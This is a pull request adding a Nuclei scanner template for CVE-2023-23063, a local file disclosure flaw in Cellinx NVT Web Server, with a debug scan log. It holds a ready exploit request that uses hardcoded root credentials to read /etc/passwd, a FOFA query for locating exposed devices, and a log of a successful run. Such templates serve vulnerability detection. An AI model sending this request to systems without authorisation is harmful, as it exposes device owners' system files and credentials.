### PR TITLE
Add CVE-2023-23063 (vKEV)

### DIFF
--- a/http/cves/2023/CVE-2023-23063.yaml
+++ b/http/cves/2023/CVE-2023-23063.yaml
@@ -17,28 +17,21 @@ info:
     cpe: cpe:2.3:a:cellinx:nvt_web_server:1.0.6.002b:*:*:*:*:*:*:*
   metadata:
     verified: true
+    fofa-query: body="/viewer/viewer.html" && header="lighttpd" && country="KR"
     max-request: 1
     vendor: cellinx
     product: nvt_web_server
-    fofa-query: body="/viewer/viewer.html" && header="lighttpd" && country="KR"
-  tags: cve,cve2023,cellinx,nvt,vkev
+  tags: cve,cve2023,cellinx,lfi,nvt,vkev
 
 http:
   - method: GET
     path:
       - "{{BaseURL}}/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd"
 
-    matchers-condition: and
     matchers:
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-
-      - type: word
-        part: header
-        words:
-          - "TRACKID="
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "regex('root:.*:0:0:', body)"
+          - "contains(header, 'TRACKID=')"
+        condition: and

--- a/http/cves/2023/CVE-2023-23063.yaml
+++ b/http/cves/2023/CVE-2023-23063.yaml
@@ -14,13 +14,15 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2023-23063
     cwe-id: CWE-22
+    epss-score: 0.00096
+    epss-percentile: 0.27937
     cpe: cpe:2.3:a:cellinx:nvt_web_server:1.0.6.002b:*:*:*:*:*:*:*
   metadata:
     verified: true
-    fofa-query: body="/viewer/viewer.html" && header="lighttpd" && country="KR"
     max-request: 1
     vendor: cellinx
     product: nvt_web_server
+    fofa-query: body="/viewer/viewer.html" && header="lighttpd" && country="KR"
   tags: cve,cve2023,cellinx,lfi,nvt,vkev
 
 http:

--- a/http/cves/2023/CVE-2023-23063.yaml
+++ b/http/cves/2023/CVE-2023-23063.yaml
@@ -1,0 +1,44 @@
+id: CVE-2023-23063
+
+info:
+  name: Cellinx NVT Web Server - Local File Disclosure
+  author: daffainfo
+  severity: high
+  description: |
+    Cellinx NVT v1.0.6.002b was discovered to contain a local file disclosure vulnerability via the component /cgi-bin/GetFileContent.cgi.
+  reference:
+    - https://github.com/ahmedalroky/Disclosures/tree/cellinx
+    - http://nvd.nist.gov/vuln/detail/CVE-2023-23063
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2023-23063
+    cwe-id: CWE-22
+    cpe: cpe:2.3:a:cellinx:nvt_web_server:1.0.6.002b:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: cellinx
+    product: nvt_web_server
+    fofa-query: body="/viewer/viewer.html" && header="lighttpd" && country="KR"
+  tags: cve,cve2023,cellinx,nvt,vkev
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: word
+        part: header
+        words:
+          - "TRACKID="
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

Cellinx NVT v1.0.6.002b was discovered to contain a local file disclosure vulnerability via the component /cgi-bin/GetFileContent.cgi.

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Debug

```

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2023-23063] Dumped HTTP request for http://REDACTED/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd

GET /cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2023-23063] Dumped HTTP response http://REDACTED/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
Date: Mon, 08 Feb 1971 09:57:31 GMT
Server: lighttpd/1.4.33
Set-Cookie: TRACKID=XXXXXXXXXXXXXXXXXXXXXXXX; Path=/; Version=1

root:XXXXXXXXXXX:0:0:Administrator:/:/bin/sh
nobody:*:99:99:Nobody:/:
[CVE-2023-23063:regex-1] [http] [high] http://REDACTED/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd
[CVE-2023-23063:word-2] [http] [high] http://REDACTED/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd
[CVE-2023-23063:status-3] [http] [high] http://REDACTED/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd
[INF] Scan completed in 695.379375ms. 3 matches found.
```